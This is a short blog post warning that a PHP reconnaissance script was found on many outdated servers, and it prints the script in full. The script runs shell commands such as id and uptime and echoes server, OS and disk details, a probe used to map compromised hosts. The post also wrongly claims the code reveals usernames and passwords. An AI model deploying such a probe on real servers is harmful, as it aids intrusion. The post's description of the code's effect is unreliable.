Somebody are trying to cross-link this blog to a security issue in PHP3. The code below will give username and password to the person using the script – if the system is outdated securitywise.
This blog is secured to the extent where the author aree comfortable with exposing small exploits like this – but be aware, this exploit was found on all the servers Ketil did bother to check. There are more than 200 servers in the logs, so there are quite a lot outdated servers out there..
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 | < ?php function ConvertBytes($number) { $len = strlen($number); if($len < 4) { return sprintf("%d b", $number); } if($len >= 4 && $len < =6) { return sprintf("%0.2f Kb", $number/1024); } if($len >= 7 && $len < =9) { return sprintf("%0.2f Mb", $number/1024/1024); } return sprintf("%0.2f Gb", $number/1024/1024/1024); } echo "Pandega<br>"; $un = @php_uname(); $up = system(uptime); $id1 = system(id); $pwd1 = @getcwd(); $sof1 = getenv("SERVER_SOFTWARE"); $php1 = phpversion(); $name1 = $_SERVER['SERVER_NAME']; $ip1 = gethostbyname($SERVER_ADDR); $free1= diskfreespace($pwd1); $free = ConvertBytes(diskfreespace($pwd1)); if (!$free) {$free = 0;} $all1= disk_total_space($pwd1); $all = ConvertBytes(disk_total_space($pwd1)); if (!$all) {$all = 0;} $used = ConvertBytes($all1-$free1); $os = @PHP_OS; echo "Pandega was here ..<br />"; echo "uname -a: $un<br />"; echo "os: $os<br />"; echo "uptime: $up<br />"; echo "id: $id1<br />"; echo "pwd: $pwd1<br />"; echo "php: $php1<br />"; echo "software: $sof1<br />"; echo "server-name: $name1<br />"; echo "server-ip: $ip1<br />"; echo "free: $free<br />"; echo "used: $used<br />"; echo "total: $all<br />"; ?> |
The really unfortunate thing is that this script was located as textfile on the servers checked. dont know if there were php-files inserted as well..
It did contain a bit binary code at the bottom, but that code is NOT shown on this blog..